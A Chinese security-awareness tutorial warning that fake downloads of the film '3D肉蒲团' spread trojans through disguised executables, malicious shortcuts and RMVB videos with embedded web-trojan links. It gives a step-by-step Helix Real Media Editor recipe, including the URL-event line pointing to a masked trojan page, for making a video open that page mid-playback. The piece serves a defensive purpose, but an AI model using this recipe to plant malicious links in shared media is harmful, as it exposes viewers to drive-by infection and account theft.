非出网教程/电脑安全教程/内容

欲望陷阱!小心《3D肉蒲团》背后的阴谋

电脑安全教程2024-02-28 阅读()
随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。

《3D肉蒲团》作为本年度最受瞩目的大片之一,该片从筹备之日起便引起了巨大的轰动,网络上对于该片的评论及资料更是数不胜数。随着该片的公映,网友们疯狂地在网络上寻找该片的下载资源,但下载下来的大多是虚假的内容,结果电影没看成,系统却崩溃了,悲剧一点的游戏账号也被盗了。为什么会这样呢?让我们来分析一下网络上《3D肉蒲团》下载资源背后的陷阱吧。


  ★编辑提示:多媒体文件也可能是木马


  在我们的印象中,木马应该是exe或者com为结尾的可执行文件。我们从网络上下载可执行文件后,会比较谨慎的打开,或者打开前用杀毒软件查杀一番,因为随着网络安全形势的严峻,这些基本常识大家还是懂一点的。但是对于多媒体文件,很多人的警惕性就没那么高了,通常下载下来以后会毫不犹豫的运行,理由很简单:“多媒体文件会有什么危险,看个电影也会中病毒?这不是开玩笑吗。”


  可事实上,看个电影真的会中毒!无论是WMV、RM还是RMVB文件,都有可能成为黑客的帮凶。黑客可以通过软件在视频文件中插入网页,而这个网页通常是带有网页木马的。这样当用户在观看电影的时候便会无声无息的运行网页木马,从而落入黑客的陷阱。


  一、伪造视频文件


  这类“视频”其后缀名并不是WMV、RMVB等视频文件后缀,而是exe这样的可执行文件后缀。通常黑客会将木马病毒加以处理,并使用视频名字对文件进行命名,从而诱骗用户点击。另一类是视频发布者出于利益所驱使,将广告软件伪装成视频文件,诱骗用户安装从而谋取利益(例如将Qvod的安装包伪装成视频文件让用户下载安装,这样发布者就可以获得推广受益)。


  二、恶意的快捷方式


  这类视频文件通常会以压缩包的形式发布,在压缩包中不仅有视频文件也有网站的快捷方式文件。当然这些快捷方式的文件名也极具诱惑性,例如“更多精彩大片免费下载”、“5000部火爆X片下载”等等,但这些快捷方式都链接至网页木马,当你双击打开时就会触发木马。黑客经常用的另一种方法是:首先伪造一个无法打开的视频文件,然后制作一个快捷方式,提示用户下载解码器,接着将木马伪装成解码器供用户下载。


欲望陷阱!小心《3D肉蒲团》背后的阴谋

▲恶意的快捷方式


  三、在视频中插入木马


  在所有通过视频传播木马的方法中,这一种是最具杀伤力的,因为其从外表上看和正常视频文件没有任何区别,即使双击开始播放了仍旧看不出异样。那么木马是怎么跑进视频里面去的呢?让我们来看下其插入过程:


  首先安装“Helix Producer Plus(RMVB文件编辑软件)”软件,安装完毕后我们进入其安装目录,打开其中的RealMediaEditor文件夹。双击其中的rmedtgui.exe文件,运行“Helix Real媒体编辑器”。


  Step1、将我们事先准备好的网页木马上传到网页空间中,并得到网页木马的网址。例如:“http://www.***.com/muma.htm”。


  Step2、创建一个文本文件123.txt,输入如下内容:“u 00:50:00 00:51:02 http://www.***.com/muma.htm”。


  Step3、在“Helix Real媒体编辑器”中单击“文件”菜单→“打开”,浏览选中需要制作的RMVB文件。


欲望陷阱!小心《3D肉蒲团》背后的阴谋

▲编辑一个“URL触发事件”


  Step4、单击软件中的“工具”菜单→“附加事件”,在浏览框中选中123.txt,这时123.txt会自动整合进视频文件中。


  Step5、单击“文件”菜单→“另存为”,将附加有事件的RMVB文件保存。


  这样只要用户播放这个视频,就会在播放至50分钟时触发网页木马。


  可见,黑客是十分狡猾的,可以利用视频文件来传播木马,但我们也不必害怕,只要做到不随便运行可执行文件,不打开陌生网页就可以了。另外要及时安装系统补丁,这样就可以轻松对付插入到视频中的网页木马。



上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。



……

相关阅读